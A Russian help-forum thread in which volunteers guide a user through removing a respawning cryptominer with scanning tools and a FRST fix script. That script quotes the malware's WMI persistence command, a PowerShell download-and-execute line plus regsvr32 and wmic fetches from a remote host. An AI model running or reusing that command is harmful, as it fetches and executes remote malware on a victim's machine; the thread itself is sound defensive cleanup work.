Решена Проблема с майнером: загрузка ЦП и вирусный активность

Статус
В этой теме нельзя размещать новые ответы.

Droopi

Новый пользователь
Сообщения
8
Реакции
0
Добрый день.

На компьютере появился майнер, очень сильно грузит ЦП. Загрузку более 80 % на все ядра можно увидеть в аиде, если открыть диспетчер задач майнер сбрасывает свою активность в 0, как только закроешь диспетчер - вирус снова оживает.
Если запустить компьютер без интернета - вирус не активен. Как только включишь интернет - вирус оживает и начинает майнить.
С помощью программы GridinSoft Anti-Malware нащёл вирус. Она находит следующие файлы:

Безымянный.jpg



потом, сама удаляет их:


Безымянный2.png

после этого компьютер работает нормально, НО стоит его перезагрузить - и данные файлы появляются снова и всё начинается с начало.
Если залезть в эту папку вручную (windowstask) - она сразу закрывается. Руками папка не удаляется, говорит, что уже используется.
Нужна помощь...
 
Последнее редактирование:
Вот пролечите, и не перезагружая:

Скачайте, распакуйте и запустите (от имени администратора) AV block remover.
По окончании всех процедур произойдет перезагрузка системы. Прикрепите созданный утилитой лог AV_block_remove.log к следующему сообщению.

Если не запускается, то переименуйте ее (например в AV_b_r.exe) или воспользуйтесь версией с случайным именем файла
 
Вот пролечите, и не перезагружая:

Скачайте, распакуйте и запустите (от имени администратора) AV block remover.
По окончании всех процедур произойдет перезагрузка системы. Прикрепите созданный утилитой лог AV_block_remove.log к следующему сообщению.

Если не запускается, то переименуйте ее (например в AV_b_r.exe) или воспользуйтесь версией с случайным именем файла
Вир постоянно закрывает браузер, не давал скачать прогу, скачивал через телефон в итоге ) потом не двала запустить - запустить получилось с другим именем файла. После запуска программы проходит секунд 5 и она сразу закрывается. Смог запустить её только в безопасном режиме нормально, чтобы не закрывалась:Ireful1:
Отсканировало, вроде всё удалило. СПАСИБО ПРИОГРОМНЕЙШЕЕ!!!!
Прикрепляю созданный лог после чистки из безопасного режима
 

Вложения

  • AV_block_remove_2022.09.07-11.48.log
    10.4 KB · Просмотры: 3
Последнее редактирование:
Вот пролечите, и не перезагружая:

Скачайте, распакуйте и запустите (от имени администратора) AV block remover.
По окончании всех процедур произойдет перезагрузка системы. Прикрепите созданный утилитой лог AV_block_remove.log к следующему сообщению.

Если не запускается, то переименуйте ее (например в AV_b_r.exe) или воспользуйтесь версией с случайным именем файла
Вот второй лог, когда я смог запустить прогу уже в нормальном режиме, а не в безопасном. Прога больше ничего не нашла, но отчеты отличаются
 

Вложения

  • AV_block_remove_2022.09.07-11.58.log
    3.7 KB · Просмотры: 3
Последнее редактирование:
Здравствуйте!

Хорошо, теперь, пожалуйста, соберите архив с именем CollectionLog с помощью Автологера по правилам раздела.
Новую тему создавать не нужно, продолжаем здесь.
 

Вложения

  • CollectionLog-2022.09.07-12.57.zip
    50 KB · Просмотры: 1
Спасибо.
Не нужно полностью цитировать предыдущее сообщение, пишите в нижнем поле быстрого ответа.

Деинсталлируйте прекративший поддержку
Adobe Flash Player 32 PPAPI
и нежелательный

Дополнительно:
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 
"Adobe Flash Player 32 PPAPI" и "VirtualDJ 2018" удалил
"Сканировать" тыкнул, 2 появившихся файла прикрепляю. Кнопку "исправить" не надо нажимать?
 

Вложения

  • Addition.txt
    92.1 KB · Просмотры: 1
  • FRST.txt
    35.8 KB · Просмотры: 1
Последнее редактирование:
Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CloseProcesses:
    SystemRestore: On
    CreateRestorePoint:
    GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
    Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    Task: {A217D4FE-5CA5-4324-942D-263D00497BFC} - System32\Tasks\Microsoft\Windows\WindowsBackup\RealtekCheck => C:\Programdata\ReaItekHD\taskhost.exe (Нет файла) <==== ВНИМАНИЕ
    Task: {B0427063-BE9B-4F78-954F-6A9FFD6354F1} - System32\Tasks\Microsoft\Windows\WindowsBackup\OnlogonCheck => C:\Programdata\ReaItekHD\taskhostw.exe (Нет файла) <==== ВНИМАНИЕ
    Task: {B388E385-FBA4-44F9-8F97-6C182D59BD20} - System32\Tasks\Microsoft\Windows\WindowsBackup\WinlogonCheck => C:\Programdata\ReaItekHD\taskhost.exe (Нет файла) <==== ВНИМАНИЕ
    Task: {B45A7762-1FEB-40CE-A23F-C3669FED460E} - System32\Tasks\Microsoft\Windows\WindowsBackup\TaskCheck => C:\Programdata\ReaItekHD\taskhostw.exe (Нет файла) <==== ВНИМАНИЕ
    C:\Users\Andrei\AppData\Local\Google\Chrome\User Data\Default\Extensions\mjmpfdkmpojoeemjmfiddlhkkndcdpno
    CHR HKU\S-1-5-21-3832446532-3583370067-2866169278-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjmpfdkmpojoeemjmfiddlhkkndcdpno]
    Менеджер браузеров (HKLM-x32\...\{C187DB08-7705-4616-834B-87B3087AE698}) (Version: 3.0.7.830 - Яндекс) Hidden
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"topk4\"",Filter="__EventFilter.Name=\"topk3\"::
    WMI:subscription\__EventFilter->topk3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 11000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
    WMI:subscription\CommandLineEventConsumer->topk4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.ha7455h6fi1.net:8080/power.txt')||regsvr32 /u /s /i:http://ha7455h6fi1.net:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://wmi.ha7455h6fi1.net:8220/s.xsl"]
    AlternateDataStreams: C:\ProgramData\TEMP:07BF512B [152]
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 
готово.
 

Вложения

  • Fixlog.txt
    7.1 KB · Просмотры: 1
Скрипт отработал успешно. Что сейчас с проблемой?
 
Та всё отлично, ещё AV block remover помог, после его прогона в безопасном режиме всё наладилось - ЦП не нагружается, форум не закрывается, GridinSoft Anti-Malware как и сам AV ничего не находят.
Спасибо большое за помощь!
 
Было ещё кое-что, что следовало очистить. Отлично, завершаем:

1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.
  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10/11)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
 
1. Да не, зачем же мне их удалять, пусть будут. Вдруг ещё когда пригодятся, программы то отличные!

2. Файл прикладываю.
 

Вложения

  • SecurityCheck.txt
    15.8 KB · Просмотры: 1
Автологер и AVbr, например, обновляются ежедневно. Остальные тоже часто. Весят они немного, поэтому лучше запомните где скачать и удалите.

------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась Внимание! Скачать обновления
^Корпоративные версии обновляются установкой с DVD или Flash-носителя соответствующей редакции. На устройстве может отсутствовать возможность получать обновления, если его оборудование несовместимо, на нем нет актуальных драйверов или истек срок его поддержки, предоставляемой поставщиком вычислительной техники (OEM).^
Internet Explorer 11.3383.14393.0 Внимание! Скачать обновления
Контроль учётных записей пользователя включен (Уровень 2)
Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB5004238 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Notepad++ (64-bit x64) v.8.3.3 Внимание! Скачать обновления
NVIDIA GeForce Experience 3.22.0.32 v.3.22.0.32 Внимание! Скачать обновления
TeamViewer v.15.2.2756 Внимание! Скачать обновления
------------------------------- [ Backup ] --------------------------------
Яндекс.Диск v.3.1.22.3711 Внимание! Скачать обновления
Google Drive v.1.31.2873.2758 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
7-Zip 17.01 beta (x64) v.17.01 beta Данная версия программы больше не поддерживается разработчиком.. Удалите старую версию, скачайте и установите новую.
WinRAR 5.50 v.5.50 Внимание! Скачать обновления
-------------------------- [ IMAndCollaborate ] ---------------------------
Discord v.0.0.310 Внимание! Скачать обновления
Telegram Desktop version 4.0.2 v.4.0.2 Внимание! Скачать обновления
Skype, версия 8.79 v.8.79 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
uTorrent Web v.1.2.9 Внимание! Клиент сети P2P с рекламным модулем!.
-------------------------------- [ Media ] --------------------------------
K-Lite Mega Codec Pack 14.6.0 v.14.6.0 Внимание! Скачать обновления
VLC media player v.3.0.16 Внимание! Скачать обновления
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Reader XI (11.0.11) - Russian v.11.0.11 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Acrobat Reader DC.
------------------------------- [ Browser ] -------------------------------
Yandex v.22.7.5.940 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
Google Chrome v.104.0.5112.102 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О браузере Google Chrome!^
---------------------------- [ UnwantedApps ] -----------------------------
CCleaner Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
Reg Organizer 8.76 v.8.76 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
Менеджер браузеров v.3.0.7.830 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.


На перечисленное обратите внимание и по возможности исправьте.
Читайте Рекомендации после удаления вредоносного ПО
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу